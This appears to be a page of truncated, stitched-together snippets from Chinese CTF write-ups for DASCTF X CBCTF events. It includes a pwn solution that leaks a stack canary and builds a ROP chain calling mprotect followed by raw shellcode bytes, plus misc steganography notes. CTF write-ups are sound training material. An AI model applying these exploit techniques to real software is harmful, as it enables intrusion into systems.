DASCTF X CBCTF 2023|无畏者先行 [PWN] WP📌1.GuestBook题目保护情况 开启canary,nx保护64位ida载入 首先可以通过输入0x18个垃圾数据可以通过打印泄露出canary这里至多有四次输入机会每次都可以溢出,但是有00截断程序存在后门🔢思路:1.通过打印泄露出canary...
rop=p64(pop_rdi)+p64(leak_addr-0x50)+p64(pop_rsi)+p64(0x1000)+p64(pop_rdx_r12)+p64(7)+p64(0)+p64(pop_rax)+p64(10)+p64(mprotect)+p64(base_addr+0x4150) rop+=b"\x48\xC7\xC0\x03\x00\x00\x00\x48\xC7\xC7\x00\x00\x00\x00\x0F\x05\x49\xB8\x2F\x66\x6C\x61\...
DASCTFX CBCTF 2022九月挑战赛Writeup DASCTF CBCTF bc 3d Desktop 原创 末初mochu7 2023-06-19 19:42:46 211阅读 DASCTFX GFCTF 2022十月挑战赛Writeup DASCTFX GFCTF 2022十月挑战赛Writeup GFCTF2022 DASCTF2022十月挑战赛 压缩包 GNU HTTP
pwn fastbin attack 漏洞分析 ubuntu 转载 mob604756f1c0ca 2021-05-29 23:26:00 264阅读 2 2021DASCTF实战精英夏令营暨DASCTFJuly X CBCTF 4th writeup 根据赛后讲解学习。 #Misc Nuclear_wastewater 二维码扫码没啥内容。。看图片像素。 from PIL import Image pic = Image.open("aaaaa.png") # type: Imag...
首先先说说DASCTF X BUU DASCTF2021 这是BUUCTF联手DASCTF举办的五月赛 来看看题目 Misc项 签到题 这道题就贼TM简单,直接复制粘贴就OK flag{welcome_to_dasctf_may} Holmes (PS:这题可是卡了我好久) 看这张图片,会发现这是跳舞的小人密码,上百度找找对照图 ...
frompwnimport* context.os ='linux'context.log_level ="debug"context.arch ='amd64'p = process('./canary3')#, env={"LD_PRELOAD":'./libc-2.27.so'})#libc = ELF('./libc-2.27.so')elf = ELF('./canary3') s =lambdadata :p.send(str(data)) ...
2021DASCTF实战精英夏令营暨DASCTFJuly X CBCTF4th-MISC-ezSteganography 根据这道题的名字,不难猜到要用到stegsolve 先放到stegsolve里面,看一看 发现在red plane1的通道 有一串提示 根据提示,顺藤摸瓜会发现在green plane0通道好像有什么东西 接着日常操作,Analyse——data extract 选中green0通道 save bi ... ...